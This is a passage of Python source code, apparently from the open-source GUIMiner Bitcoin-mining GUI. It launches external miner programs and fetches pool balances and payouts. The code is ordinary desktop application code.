self.txt_flags.GetValue())
return cmd, os.path.dirname(self.external_path)
def configure_subprocess_cgminer(self):
"""Set up the command line for cgminer."""
path = self.external_path
if path.endswith('.py'):
path = "python " + path
# Command line arguments for cgminer here:
# -u <username>
# -p <password>
# -o <http://server.ip:port>
# -d <device appear in pyopencl>
# -l <log message period in second>
# -T <disable curses interface and output to console (stdout)>
cmd = "%s -u %s -p %s -o http://%s:%s -d %s -l 1 -T %s" % (
path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_without_http_prefix,
self.txt_port.GetValue(),
self.device_index,
self.txt_flags.GetValue())
return cmd, os.path.dirname(self.external_path)
# End backend specific code
###########################
def start_mining(self):
"""Launch a miner subprocess and attach a MinerListenerThread."""
self.is_paused = False
# Avoid showing a console window when frozen
try: import win32process
except ImportError: flags = 0
else: flags = win32process.CREATE_NO_WINDOW
# Determine what command line arguments to use
listener_cls = MinerListenerThread
if not self.is_external_miner:
conf_func = self.configure_subprocess_poclbm
elif "rpcminer" in self.external_path:
conf_func = self.configure_subprocess_rpcminer
elif "bitcoin-miner" in self.external_path:
conf_func = self.configure_subprocess_ufasoft
elif "phoenix" in self.external_path:
conf_func = self.configure_subprocess_phoenix
listener_cls = PhoenixListenerThread
elif "cgminer" in self.external_path:
conf_func = self.configure_subprocess_cgminer
listener_cls = CgListenerThread
else:
raise ValueError # TODO: handle unrecognized miner
cmd, cwd = conf_func()
# for ufasoft:
# redirect stderr to stdout
# use universal_newlines to catch the \r output on Mhash/s lines
try:
logger.debug(_('Running command: ') + cmd)
# for cgminer:
# We need only the STDOUT for meaningful messages.
if conf_func == self.configure_subprocess_cgminer:
self.miner = subprocess.Popen(cmd, cwd=cwd,
stdout=subprocess.PIPE,
stderr=None,
universal_newlines=True,
creationflags=flags,
shell=(sys.platform != 'win32'))
else:
self.miner = subprocess.Popen(cmd, cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
creationflags=flags,
shell=(sys.platform != 'win32'))
except OSError:
raise #TODO: the folder or exe could not exist
self.miner_listener = listener_cls(self, self.miner)
self.miner_listener.daemon = True
self.miner_listener.start()
self.is_mining = True
self.set_status(STR_STARTING, 1)
self.start.SetLabel(self.get_start_label())
try:
set_process_affinity(self.miner.pid, self.affinity_mask)
except:
pass # TODO: test on Linux
def on_close(self):
"""Prepare to close gracefully."""
self.stop_mining()
self.balance_refresh_timer.Stop()
def stop_mining(self):
"""Terminate the poclbm process if able and its associated listener."""
if self.miner is not None:
if self.miner.returncode is None:
# It didn't return yet so it's still running.
try:
self.miner.terminate()
except OSError:
pass # TODO: Guess it wasn't still running?
self.miner = None
if self.miner_listener is not None:
self.miner_listener.shutdown_event.set()
self.miner_listener = None
self.is_mining = False
self.is_paused = False
self.set_status(STR_STOPPED, 1)
self.start.SetLabel(self.get_start_label())
def update_khash(self, rate):
"""Update our rate according to a report from the listener thread.
If we are receiving rate messages then it means poclbm is no longer
reporting errors.
"""
self.last_rate = rate
self.set_status(format_khash(rate), 1)
if self.is_possible_error:
self.update_statusbar()
self.is_possible_error = False
def update_statusbar(self):
"""Show the shares or equivalent on the statusbar."""
if self.is_solo:
text = _("Difficulty 1 hashes: %(nhashes)d %(update_time)s") % \
dict(nhashes=self.accepted_shares,
update_time=self.format_last_update_time())
if self.solo_blocks_found > 0:
block_text = _("Blocks: %d, ") % self.solo_blocks_found
text = block_text + text
else:
text = _("Shares: %d accepted") % self.accepted_shares
if self.invalid_shares > 0:
text += _(", %d stale/invalid") % self.invalid_shares
text += " %s" % self.format_last_update_time()
self.set_status(text, 0)
def update_last_time(self, accepted):
"""Set the last update time to now (in local time)."""
now = time.time()
if accepted:
self.accepted_times.append(now)
while now - self.accepted_times[0] > SAMPLE_TIME_SECS:
self.accepted_times.popleft()
else:
self.invalid_times.append(now)
while now - self.invalid_times[0] > SAMPLE_TIME_SECS:
self.invalid_times.popleft()
def format_last_update_time(self):
"""Format last update time for display."""
time_fmt = '%I:%M:%S%p'
if self.last_update_time is None:
return ""
return _("- last at %s") % time.strftime(time_fmt, self.last_update_time)
def update_shares(self, accepted):
"""Update our shares with a report from the listener thread."""
if self.is_solo and accepted:
self.solo_blocks_found += 1
elif accepted:
self.accepted_shares += 1
else:
self.invalid_shares += 1
self.update_last_time(accepted)
self.update_statusbar()
def update_status(self, msg):
"""Update our status with a report from the listener thread.
If we receive a message from poclbm we don't know how to interpret,
it's probably some kind of error state - in this case the best
thing to do is just show it to the user on the status bar.
"""
self.set_status(msg)
self.is_possible_error = True
def set_status(self, msg, index=0):
"""Set the current statusbar text, but only if we have focus."""
if self.parent.GetSelection() == self.parent.GetPageIndex(self):
self.statusbar.SetStatusText(msg, index)
def on_focus(self):
"""When we receive focus, update our status.
This ensures that when switching tabs, the statusbar always
shows the current tab's status.
"""
self.update_statusbar()
if self.is_mining:
self.update_khash(self.last_rate)
else:
self.set_status(STR_STOPPED, 1)
def get_taskbar_text(self):
"""Return text for the hover state of the taskbar."""
rate = format_khash(self.last_rate) if self.is_mining else STR_STOPPED
return "%s: %s" % (self.name, rate)
def update_solo(self):
"""Update our easy hashes with a report from the listener thread."""
self.accepted_shares += 1
self.update_last_time(True)
self.update_statusbar()
def on_select_server(self, event):
"""Update our info in response to a new server choice."""
new_server_name = self.server.GetValue()
new_server = self.get_server_by_field(new_server_name, 'name')
self.change_server(new_server)
def get_server_by_field(self, target_val, field):
"""Return the first server dict with the specified val, or {}."""
for s in self.servers:
if s.get(field) == target_val:
return s
return {}
def set_widgets_visible(self, widgets, show=False):
"""Show or hide each widget in widgets according to the show flag."""
for w in widgets:
if show:
w.Show()
else:
w.Hide()
def set_tooltips(self):
add_tooltip(self.server, _("Server to connect to. Different servers have different fees and features.\nCheck their websites for full information."))
add_tooltip(self.website, _("Website of the currently selected server. Click to visit."))
add_tooltip(self.device_listbox, _("Available OpenCL devices on your system."))
add_tooltip(self.txt_host, _("Host address, without http:// prefix."))
add_tooltip(self.txt_port, _("Server port. This is usually 8332."))
add_tooltip(self.txt_username, _("The miner's username.\nMay be different than your account username.\nExample: Kiv.GPU"))
add_tooltip(self.txt_pass, _("The miner's password.\nMay be different than your account password."))
add_tooltip(self.txt_flags, _("""Extra flags to pass to the miner.
For poclbm use -v -w 128 for dedicated mining, append -f 60 for desktop usage.
For cgminer use -I 8 or -I 9. Without any params for desktop usage."""))
for chk in self.affinity_chks:
add_tooltip(chk, _("CPU cores used for mining.\nUnchecking some cores can reduce high CPU usage in some systems."))
def reset_statistics(self):
"""Reset our share statistics to zero."""
self.solo_blocks_found = 0
self.accepted_shares = 0
self.accepted_times.clear()
self.invalid_shares = 0
self.invalid_times.clear()
self.update_statusbar()
def change_server(self, new_server):
"""Change the server to new_server, updating fields as needed."""
self.reset_statistics()
# Set defaults before we do server specific code
self.set_tooltips()
self.set_widgets_visible(self.all_widgets, True)
self.withdraw.Disable()
url = new_server.get('url', 'n/a')
self.website.SetLabel(url)
self.website.SetURL(url)
# Invalidate any previous auth token since it won't be valid for the
# new server.
self.balance_auth_token = ""
if 'host' in new_server:
self.txt_host.SetValue(new_server['host'])
if 'port' in new_server:
self.txt_port.SetValue(str(new_server['port']))
# Call server specific code.
host = new_server.get('host', "").lower()
if host == "api2.bitcoin.cz" or host == "mtred.com": self.layout_slush()
if "eligius.st" in host: self.layout_eligius()
elif host == "bitpenny.dyndns.biz": self.layout_bitpenny()
elif host == "pit.deepbit.net": self.layout_deepbit()
elif host == "btcmine.com": self.layout_btcmine()
elif host == "rr.btcmp.com": self.layout_btcmp()
elif "btcguild.com" in host: self.layout_btcguild()
elif host == "bitcoin-server.de": self.layout_bitcoinserver
elif host == "pit.x8s.de": self.layout_x8s()
else: self.layout_default()
self.Layout()
self.update_tab_name()
def on_balance_cooldown_tick(self, event=None):
"""Each second, decrement the cooldown for refreshing balance."""
self.balance_cooldown_seconds -= 1
self.balance_refresh.SetLabel("%d..." % self.balance_cooldown_seconds)
if self.balance_cooldown_seconds <= 0:
self.balance_refresh_timer.Stop()
self.balance_refresh.Enable()
self.balance_refresh.SetLabel(STR_REFRESH_BALANCE)
def require_auth_token(self):
"""Prompt the user for an auth token if they don't have one already.
Set the result to self.balance_auth_token and return None.
"""
if self.balance_auth_token:
return
url = self.server_config.get('balance_token_url')
dialog = BalanceAuthRequest(self, url)
dialog.txt_token.SetFocus()
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_CANCEL:
return
self.balance_auth_token = dialog.get_value() # TODO: validate token?
def is_auth_token_rejected(self, response):
"""If the server rejected our token, reset auth_token and return True.
Otherwise, return False.
"""
if response.status in [401, 403]: # 401 Unauthorized or 403 Forbidden
# Token rejected by the server - reset their token so they'll be
# prompted again
self.balance_auth_token = ""
return True
return False
def request_balance_get(self, balance_auth_token, use_https=False):
"""Request our balance from the server via HTTP GET and auth token.
This method should be run in its own thread.
"""
response, data = http_request(
self.server_config['balance_host'],
"GET",
self.server_config["balance_url"] % balance_auth_token,
use_https=use_https
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
else:
try:
info = json.loads(data)
confirmed = (info.get('confirmed_reward') or
info.get('confirmed') or
info.get('balance') or
info.get('user', {}).get('confirmed_rewards') or
0)
unconfirmed = (info.get('unconfirmed_reward') or
info.get('unconfirmed') or
info.get('user', {}).get('unconfirmed_rewards') or
0)
if self.server_config.get('host') == "pit.deepbit.net":
ipa = info.get('ipa', False)
self.withdraw.Enable(ipa)
if self.server_config.get('host') == "rr.btcmp.com":
ipa = info.get('can_payout', False)
self.withdraw.Enable(ipa)
data = _("%s confirmed") % format_balance(confirmed)
if unconfirmed > 0:
data += _(", %s unconfirmed") % format_balance(unconfirmed)
except: # TODO: what exception here?
data = _("Bad response from server.")
wx.CallAfter(self.balance_amt.SetLabel, data)
def on_withdraw(self, event):
self.withdraw.Disable()
host = self.server_config.get('host')
if host == 'bitpenny.dyndns.biz':
self.withdraw_bitpenny()
elif host == 'pit.deepbit.net':
self.withdraw_deepbit()
elif host == 'rr.btcmp.com':
self.withdraw_btcmp()
def requires_auth_token(self, host):
"""Return True if the specified host requires an auth token for balance update."""
HOSTS_REQUIRING_AUTH_TOKEN = ["api2.bitcoin.cz",
"btcmine.com",
"pit.deepbit.net",
"pit.x8s.de",
"mtred.com",
"rr.btcmp.com",
"bitcoin-server.de"]
if host in HOSTS_REQUIRING_AUTH_TOKEN: return True
if "btcguild" in host: return True
return False
def requires_https(self, host):
"""Return True if the specified host requires HTTPs for balance update."""
HOSTS = ["mtred.com", "api2.bitcoin.cz"]
if host in HOSTS: return True
if "btcguild" in host: return True
return False
def on_balance_refresh(self, event=None):
"""Refresh the miner's balance from the server."""
host = self.server_config.get("host")
if self.requires_auth_token(host):
self.require_auth_token()
if not self.balance_auth_token: # They cancelled the dialog
return
try:
self.balance_auth_token.decode('ascii')
except UnicodeDecodeError:
return # Invalid characters in auth token
self.http_thread = threading.Thread(
target=self.request_balance_get,
args=(self.balance_auth_token,),
kwargs=dict(use_https=self.requires_https(host)))
self.http_thread.start()
elif host == 'bitpenny.dyndns.biz':
self.http_thread = threading.Thread(
target=self.request_payout_bitpenny, args=(False,))
self.http_thread.start()
elif 'eligius.st' in host:
self.http_thread = threading.Thread(
target=self.request_balance_eligius
)
self.http_thread.start()
self.balance_refresh.Disable()
self.balance_cooldown_seconds = 10
self.balance_refresh_timer.Start(1000)
#################################
# Begin server specific HTTP code
def withdraw_btcmp(self):
"""Launch a thread to withdraw from deepbit."""
self.require_auth_token()
if not self.balance_auth_token: # User refused to provide token
return
self.http_thread = threading.Thread(
target=self.request_payout_btcmp,
args=(self.balance_auth_token,))
self.http_thread.start()
def withdraw_deepbit(self):
"""Launch a thread to withdraw from deepbit."""
self.require_auth_token()
if not self.balance_auth_token: # User refused to provide token
return
self.http_thread = threading.Thread(
target=self.request_payout_deepbit,
args=(self.balance_auth_token,))
self.http_thread.start()
def withdraw_bitpenny(self):
self.http_thread = threading.Thread(
target=self.request_payout_bitpenny, args=(True,))
self.http_thread.start() # TODO: look at aliasing of this variable
def request_payout_btcmp(self, balance_auth_token):
"""Request payout from btcmp's server via HTTP POST."""
response, data = http_request(
self.server_config['balance_host'],
"GET",
self.server_config["payout_url"] % balance_auth_token,
use_https=False
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
else:
data = _("Withdraw OK")
wx.CallAfter(self.on_balance_received, data)
def request_payout_deepbit(self, balance_auth_token):
"""Request payout from deepbit's server via HTTP POST."""
post_params = dict(id=1,
method="request_payout")
response, data = http_request(
self.server_config['balance_host'],
"POST",
self.server_config['balance_url'] % balance_auth_token,
json.dumps(post_params),
{"Content-type": "application/json; charset=utf-8",
"User-Agent": USER_AGENT}
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
else:
data = _("Withdraw OK")
wx.CallAfter(self.on_balance_received, data)
def request_payout_bitpenny(self, withdraw):
"""Request our balance from BitPenny via HTTP POST.
If withdraw is True, also request a withdrawal.
"""
post_params = dict(a=self.txt_username.GetValue(), w=int(withdraw))
response, data = http_request(
self.server_config['balance_host'],
"POST",
self.server_config['balance_url'],
urllib.urlencode(post_params),
{"Content-type": "application/x-www-form-urlencoded"}
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
elif withdraw:
data = _("Withdraw OK")
wx.CallAfter(self.on_balance_received, data)
def request_balance_eligius(self):
"""Request our balance from Eligius
"""
response, data = http_request(
self.server_config['balance_host'],
"POST",
self.server_config['balance_url'] % (self.txt_username.GetValue(),),
)
if not data:
data = STR_CONNECTION_ERROR
try:
data = json.loads(data)
data = data['expected'] / 1e8
except BaseException as e:
data = str(e)
wx.CallAfter(self.on_balance_received, data)
def on_balance_received(self, balance):
"""Set the balance in the GUI."""
try:
amt = float(balance)
except ValueError: # Response was some kind of error
self.balance_amt.SetLabel(balance)
else:
if amt > 0.1:
self.withdraw.Enable()
amt_str = format_balance(amt)
self.balance_amt.SetLabel(amt_str)
self.Layout()
# End server specific HTTP code
###############################
def set_name(self, name):
"""Set the label on this miner's tab to name."""
self.name = name
if self.summary_name:
self.summary_name.SetLabel(self.name)
self.update_tab_name()
def update_tab_name(self):
"""Update the tab name to reflect modified status."""
name = self.name
if self.is_modified:
name += "*"
page = self.parent.GetPageIndex(self)
if page != -1:
self.parent.SetPageText(page, name)
def check_if_modified(self, event):
"""Update the title of the tab to have an asterisk if we are modified."""
self.update_tab_name()
event.Skip()
def on_saved(self):
"""Update our last data after a save."""
self.last_data = self.get_data()
self.update_tab_name()
def layout_init(self):
"""Create the sizers for this frame and set up the external text.
Return the lowest row that is available.
"""
self.frame_sizer = wx.BoxSizer(wx.VERTICAL)
self.frame_sizer.Add((20, 10), 0, wx.EXPAND, 0)
self.inner_sizer = wx.GridBagSizer(10, 5)
self.button_sizer = wx.BoxSizer(wx.HORIZONTAL)
row = 0
if self.is_external_miner:
self.inner_sizer.Add(self.external_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_external, (row, 1), span=(1, 3), flag=wx.EXPAND)
row += 1
return row
def layout_server_and_website(self, row):
"""Lay out the server and website widgets in the specified row."""
self.inner_sizer.Add(self.server_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.server, (row, 1), flag=wx.EXPAND)
self.inner_sizer.Add(self.website_lbl, (row, 2), flag=LBL_STYLE)
self.inner_sizer.Add(self.website, (row, 3), flag=wx.ALIGN_CENTER_VERTICAL)
def layout_host_and_port(self, row):
"""Lay out the host and port widgets in the specified row."""
self.inner_sizer.Add(self.host_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_host, (row, 1), flag=wx.EXPAND)
self.inner_sizer.Add(self.port_lbl, (row, 2), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_port, (row, 3), flag=wx.EXPAND)
def layout_user_and_pass(self, row):
"""Lay out the user and pass widgets in the specified row."""
self.inner_sizer.Add(self.user_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_username, (row, 1), flag=wx.EXPAND)
self.inner_sizer.Add(self.pass_lbl, (row, 2), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_pass, (row, 3), flag=wx.EXPAND)
def layout_device_and_flags(self, row):
"""Lay out the device and flags widgets in the specified row.
Hide the device dropdown if RPCMiner is present since it doesn't use it.
"""
device_visible = self.is_device_visible
self.set_widgets_visible([self.device_lbl, self.device_listbox], device_visible)
if device_visible:
self.inner_sizer.Add(self.device_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.device_listbox, (row, 1), flag=wx.EXPAND)
col = 2 * (device_visible)
self.inner_sizer.Add(self.flags_lbl, (row, col), flag=LBL_STYLE)
span = (1, 1) if device_visible else (1, 4)
self.inner_sizer.Add(self.txt_flags, (row, col + 1), span=span, flag=wx.EXPAND)
def layout_affinity(self, row):
"""Lay out the affinity checkboxes in the specified row."""
self.inner_sizer.Add(self.affinity_lbl, (row, 0))
affinity_sizer = wx.BoxSizer(wx.HORIZONTAL)
for chk in self.affinity_chks:
affinity_sizer.Add(chk)
self.inner_sizer.Add(affinity_sizer, (row, 1))
def layout_balance(self, row):
"""Lay out the balance widgets in the specified row."""
self.inner_sizer.Add(self.balance_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.balance_amt, (row, 1))
def layout_finish(self):
"""Lay out the buttons and fit the sizer to the window."""
self.frame_sizer.Add(self.inner_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
self.frame_sizer.Add(self.button_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL)
self.inner_sizer.AddGrowableCol(1)
self.inner_sizer.AddGrowableCol(3)
for btn in [self.start, self.balance_refresh, self.withdraw]:
self.button_sizer.Add(btn, 0, BTN_STYLE, 5)
self.set_widgets_visible([self.external_lbl, self.txt_external],
self.is_external_miner)
self.SetSizerAndFit(self.frame_sizer)
def layout_default(self):
"""Lay out a default miner with no custom changes."""
self.user_lbl.SetLabel(STR_USERNAME)
self.set_widgets_visible(self.hidden_widgets, False)
self.set_widgets_visible([self.balance_lbl,
self.balance_amt,
self.balance_refresh,
self.withdraw], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
customs = ["other", "solo"]
is_custom = self.server.GetStringSelection().lower() in customs
if is_custom:
self.layout_host_and_port(row=row + 1)
else:
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port], False)
self.layout_user_and_pass(row=row + 1 + int(is_custom))
self.layout_device_and_flags(row=row + 2 + int(is_custom))
self.layout_affinity(row=row + 3 + int(is_custom))
self.layout_finish()
############################
# Begin server specific code
def layout_bitpenny(self):
"""BitPenny doesn't require registration or a password.
The username is just their receiving address.
"""
invisible = [self.txt_pass, self.txt_host, self.txt_port,
self.pass_lbl, self.host_lbl, self.port_lbl]
self.set_widgets_visible(invisible, False)
self.set_widgets_visible([self.extra_info], True)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.inner_sizer.Add(self.user_lbl, (row + 1, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_username, (row + 1, 1), span=(1, 3), flag=wx.EXPAND)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.inner_sizer.Add(self.extra_info, (row + 5, 0), span=(1, 4), flag=wx.ALIGN_CENTER_HORIZONTAL)
self.layout_finish()
self.extra_info.SetLabel(_("No registration is required - just enter an address and press Start."))
self.txt_pass.SetValue('poclbm-gui')
self.user_lbl.SetLabel(_("Address:"))
add_tooltip(self.txt_username,
_("Your receiving address for Bitcoins.\nE.g.: 1A94cjRpaPBMV9ZNWFihB5rTFEeihBALgc"))
def layout_slush(self):
"""Slush's pool uses a separate username for each miner."""
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.withdraw, self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("Your miner username (not your account username).\nExample: Kiv.GPU"))
add_tooltip(self.txt_pass,
_("Your miner password (not your account password)."))
def layout_eligius(self):
"""Eligius doesn't require registration or a password.
The username is just their receiving address.
"""
invisible = [self.txt_pass, self.txt_host, self.txt_port,
self.withdraw,
self.pass_lbl, self.host_lbl, self.port_lbl]
self.set_widgets_visible(invisible, False)
self.set_widgets_visible([self.extra_info], True)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.inner_sizer.Add(self.user_lbl, (row + 1, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_username, (row + 1, 1), span=(1, 3), flag=wx.EXPAND)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.inner_sizer.Add(self.extra_info, (row + 5, 0), span=(1, 4), flag=wx.ALIGN_CENTER_HORIZONTAL)
self.layout_finish()
self.extra_info.SetLabel(_("No registration is required - just enter an address and press Start."))
self.txt_pass.SetValue('x')
self.user_lbl.SetLabel(_("Address:"))
add_tooltip(self.txt_username,
_("Your receiving address for Bitcoins.\nE.g.: 1JMfKKJqtkDPbRRsFSLjX1Cs2dqmjKiwj8"))
def layout_btcguild(self):
"""BTC Guild has the same layout as slush for now."""
self.layout_slush()
def layout_bitcoinserver(self):
"""Bitcoin-Server.de has the same layout as slush for now."""
self.layout_slush()
def layout_btcmine(self):
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.withdraw, self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("Your miner username. \nExample: kiv123@kiv123"))
add_tooltip(self.txt_pass,
_("Your miner password (not your account password)."))
def layout_deepbit(self):
"""Deepbit uses an email address for a username."""
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("The e-mail address you registered with."))
self.user_lbl.SetLabel(_("Email:"))
def layout_btcmp(self):
"""Deepbit uses an email address for a username."""
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
_("Your worker name. Is something in the form of username.workername"))
self.user_lbl.SetLabel(_("Workername:"))
def layout_x8s(self):
"""x8s has the same layout as slush for now."""
self.layout_slush()
# End server specific code
##########################
class GUIMiner(wx.Frame):
def __init__(self, *args, **kwds):
wx.Frame.__init__(self, *args, **kwds)
style = fnb.FNB_X_ON_TAB | fnb.FNB_FF2 | fnb.FNB_HIDE_ON_SINGLE_TAB
self.nb = fnb.FlatNotebook(self, -1, style=style)
# Set up notebook context menu
notebook_menu = wx.Menu()
ID_RENAME, ID_DUPLICATE = wx.NewId(), wx.NewId()
notebook_menu.Append(ID_RENAME, _("&Rename..."), _("Rename this miner"))
notebook_menu.Append(ID_DUPLICATE, _("&Duplicate...", _("Duplicate this miner")))
self.nb.SetRightClickMenu(notebook_menu)
self.Bind(wx.EVT_MENU, self.rename_miner, id=ID_RENAME)
self.Bind(wx.EVT_MENU, self.duplicate_miner, id=ID_DUPLICATE)
self.console_panel = None
self.summary_panel = None
# Servers and defaults are required, it's a fatal error not to have
# them.
server_config_path = os.path.join(get_module_path(), 'servers.ini')
with open(server_config_path) as f:
data = json.load(f)
self.servers = data.get('servers')
defaults_config_path = os.path.join(get_module_path(), 'defaults.ini')
with open(defaults_config_path) as f:
self.defaults = json.load(f)
self.parse_config()
self.do_show_opencl_warning = self.config_data.get('show_opencl_warning', True)
self.console_max_lines = self.config_data.get('console_max_lines', 5000)
ID_NEW_EXTERNAL, ID_NEW_PHOENIX, ID_NEW_CGMINER, ID_NEW_CUDA, ID_NEW_UFASOFT = wx.NewId(), wx.NewId(), wx.NewId(), wx.NewId(), wx.NewId()
self.menubar = wx.MenuBar()
file_menu = wx.Menu()
new_menu = wx.Menu()
new_menu.Append(wx.ID_NEW, _("&New OpenCL miner..."), _("Create a new OpenCL miner (default for ATI cards)"), wx.ITEM_NORMAL)
#new_menu.Append(ID_NEW_PHOENIX, _("New Phoenix miner..."), _("Create a new Phoenix miner (for some ATI cards)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_CGMINER, _("New CG miner..."), _("Create a new CGMiner (for some ATI cards)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_CUDA, _("New CUDA miner..."), _("Create a new CUDA miner (for NVIDIA cards)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_UFASOFT, _("New Ufasoft CPU miner..."), _("Create a new Ufasoft miner (for CPUs)"), wx.ITEM_NORMAL)
new_menu.Append(ID_NEW_EXTERNAL, _("New &other miner..."), _("Create a new custom miner (requires external program)"), wx.ITEM_NORMAL)
file_menu.AppendMenu(wx.NewId(), _('&New miner'), new_menu)
file_menu.Append(wx.ID_SAVE, _("&Save settings"), _("Save your settings"), wx.ITEM_NORMAL)
file_menu.Append(wx.ID_OPEN, _("&Load settings"), _("Load stored settings"), wx.ITEM_NORMAL)
file_menu.Append(wx.ID_EXIT, _("Quit"), STR_QUIT, wx.ITEM_NORMAL)
self.menubar.Append(file_menu, _("&File"))
ID_SUMMARY, ID_CONSOLE = wx.NewId(), wx.NewId()
view_menu = wx.Menu()
view_menu.Append(ID_SUMMARY, _("Show summary"), _("Show summary of all miners"), wx.ITEM_NORMAL)
view_menu.Append(ID_CONSOLE, _("Show console"), _("Show console logs"), wx.ITEM_NORMAL)
self.menubar.Append(view_menu, _("&View"))
ID_SOLO, ID_PATHS, ID_BLOCKCHAIN_PATH, ID_LAUNCH = wx.NewId(), wx.NewId(), wx.NewId(), wx.NewId()
solo_menu = wx.Menu()
solo_menu.Append(ID_SOLO, _("&Create solo password..."), _("Configure a user/pass for solo mining"), wx.ITEM_NORMAL)
solo_menu.Append(ID_PATHS, _("&Set Bitcoin client path..."), _("Set the location of the official Bitcoin client"), wx.ITEM_NORMAL)
solo_menu.Append(ID_BLOCKCHAIN_PATH, _("&Set Bitcoin data directory..."), _("Set the location of the bitcoin data directory containing the blockchain and wallet"), wx.ITEM_NORMAL)
solo_menu.Append(ID_LAUNCH, _("&Launch Bitcoin client as server"), _("Launch the official Bitcoin client as a server for solo mining"), wx.ITEM_NORMAL)
self.menubar.Append(solo_menu, _("&Solo utilities"))
ID_START_MINIMIZED = wx.NewId()
self.options_menu = wx.Menu()
self.start_minimized_chk = self.options_menu.Append(ID_START_MINIMIZED, _("Start &minimized"), _("Start the GUI minimized to the tray."), wx.ITEM_CHECK)
self.options_menu.Check(ID_START_MINIMIZED, self.config_data.get('start_minimized', False))
self.menubar.Append(self.options_menu, _("&Options"))
ID_CHANGE_LANGUAGE = wx.NewId()
lang_menu = wx.Menu()
lang_menu.Append(ID_CHANGE_LANGUAGE, _("&Change language..."), "", wx.ITEM_NORMAL)
self.menubar.Append(lang_menu, _("Language"))
ID_DONATE_SMALL = wx.NewId()
donate_menu = wx.Menu()
donate_menu.Append(ID_DONATE_SMALL, _("&Donate..."), _("Donate Bitcoins to support GUIMiner development"))
self.menubar.Append(donate_menu, _("&Donate"))
help_menu = wx.Menu()
help_menu.Append(wx.ID_ABOUT, _("&About..."), STR_ABOUT, wx.ITEM_NORMAL)
self.menubar.Append(help_menu, _("&Help"))
self.SetMenuBar(self.menubar)
self.statusbar = self.CreateStatusBar(2, 0)
try:
self.bitcoin_executable = os.path.join(os.getenv("PROGRAMFILES"), "Bitcoin", "bitcoin-qt.exe")
except:
self.bitcoin_executable = "" # TODO: where would Bitcoin probably be on Linux/Mac?
try:
self.blockchain_directory = os.path.join(os.getenv("APPDATA"), "Bitcoin")
except:
self.blockchain_directory = ""
try:
self.tbicon = GUIMinerTaskBarIcon(self)
except:
logging.error(_("Failed to load taskbar icon; continuing."))
self.set_properties()
try:
self.devices = get_opencl_devices()
except:
self.devices = []
file_menu.Enable(wx.ID_NEW, False)
file_menu.SetHelpString(wx.ID_NEW, _("OpenCL not found - can't add a OpenCL miner"))
if self.do_show_opencl_warning:
dialog = OpenCLWarningDialog(self)
dialog.ShowModal()
self.do_show_opencl_warning = not dialog.is_box_checked()
self.Bind(wx.EVT_MENU, self.name_new_profile, id=wx.ID_NEW)
#self.Bind(wx.EVT_MENU, self.new_phoenix_profile, id=ID_NEW_PHOENIX)
self.Bind(wx.EVT_MENU, self.new_cgminer_profile, id=ID_NEW_CGMINER)
self.Bind(wx.EVT_MENU, self.new_ufasoft_profile, id=ID_NEW_UFASOFT)
self.Bind(wx.EVT_MENU, self.new_cuda_profile, id=ID_NEW_CUDA)
self.Bind(wx.EVT_MENU, self.new_external_profile, id=ID_NEW_EXTERNAL)
self.Bind(wx.EVT_MENU, self.save_config, id=wx.ID_SAVE)
self.Bind(wx.EVT_MENU, self.load_config, id=wx.ID_OPEN)
